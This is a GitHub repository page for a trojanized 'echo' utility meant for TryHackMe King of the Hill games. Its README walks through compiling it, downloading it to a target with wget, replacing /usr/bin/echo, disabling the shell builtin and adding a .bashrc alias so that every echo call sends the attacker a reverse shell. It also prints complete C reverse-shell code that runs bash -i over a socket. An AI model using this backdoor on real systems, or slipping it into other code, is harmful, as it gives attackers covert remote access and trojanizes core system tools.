Skip to content

hoodietramp/Custom-Echo-For-TryHackme-KOTH

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
images
images
 
 
README.md
README.md
 
 
custom-echo.c
custom-echo.c
 
 

Repository files navigation

Malicious Binary - echo for KoTH | TryHackMe

What does it do?

  1. This custom-echo will give you a reverse shell on a custom port that you set as PORT in the c code.
  2. How it works is, whenever somebody runs an echo command on the machine in which you planted your custom-echo, it will send you a reverse shell! :shipit:
  3. This can be used in multiple ways, but in this case, we are using a reverse shell c code embedded in the raw echo.c code, that you can obtain via GitHub. (Linux, open-source! Yay.)

How to use it?

  • first, let's clone the repo:

    git clone https://github.com/hoodietramp/custom-echo

  • now let's cd into it:

    cd custom-echo

  • now, we got to compile it first:

    gcc -o custom-echo custom-echo.c

    You can also add static flag to compile it on your machine and have it ready to use on almost all linux machines.

    gcc -o custom-echo custom-echo.c --static

  • give it executable permissions:

    chmod +x custom-echo

  • Now transfer it to the machine, in which you want to use it:

    • start a python server in your machine

    • python3 -m http.server 80

    • Now, on the target machine, wget LOCAL-IP/custom-echo; chmod +x custom-echo

    • This is potentially machine breaking, as we will be swapping our malicious binary with the default echo on the machine. DO NOT TRY THIS ON YOUR OWN MACHINE.

      mv `which echo` /tmp/.tmpecho; cp custom-echo /usr/bin/echo

    • but it'll still not work because echo is a shell-built-in, means it doesn't require any external binary to work in Linux
      To fix this, use the following commands:
      enable -n echo
      echo "alias echo='/usr/bin/echo'" >> ~/.bashrc

    • Now we're ready to get our reverse shell. Let's see it in action. < 3

Testing custom-echo:

image

image

For users who want to play around with this code themselves, you can just take the below snippet and add it as called-function in any c code and compile it using the same process that we used above. (CBA with adding proper includes, if you are in this section, then you likely know how to.)

#include <stdio.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>

int caller()
{
    struct sockaddr_in sa;
    int s;
    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = inet_addr("<ip>");
    sa.sin_port = htons(<port>);
    s = socket(AF_INET, SOCK_STREAM, 0);
    connect(s, (struct sockaddr *)&sa, sizeof(sa));
    dup2(s, 0);
    dup2(s, 1);
    dup2(s, 2);
    execl("/bin/bash","bash","-i",0,0);
    return 0;
}
# Obviously call the caller func after some primary function of the code you are adding it in.

About

custom-echo for koth tryhackme, holmes is such a homie <3

Resources

Readme
Activity

Stars

15 stars

Watchers

2 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages